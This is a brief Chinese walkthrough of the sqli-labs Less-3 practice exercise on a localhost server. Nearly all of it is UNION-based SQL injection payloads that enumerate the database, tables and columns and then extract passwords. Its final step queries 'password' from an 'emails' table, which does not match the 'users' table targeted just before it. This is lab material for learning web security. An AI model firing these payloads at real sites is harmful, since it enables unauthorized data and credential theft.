1.按照路径http://localhost/sqli-labs/sqli-labs-master/Less-3/进入
2.判断注入类型----字符型
Payload:?id=1’) and 1=1--+
注:根据报错提示的语法错误,在第一行中使用接近’union select 1,2,3--’)的正确语法
3.判断注入点:2,3
Payload:id=-1’) union select 1,2,3 --+
4. 根据注入点查询指定数据库名----security
Payload:id=-1’) union select 1,database(),3 --+
5.查询指定数据库名下的表名
Payload:
id=-1’) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
6.查询指定表----users下的字段名
Payload:
id=-1’) union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
7.查询指定字段名:password
Payload:
id=-1’) union select 1,password,3 from emails--+
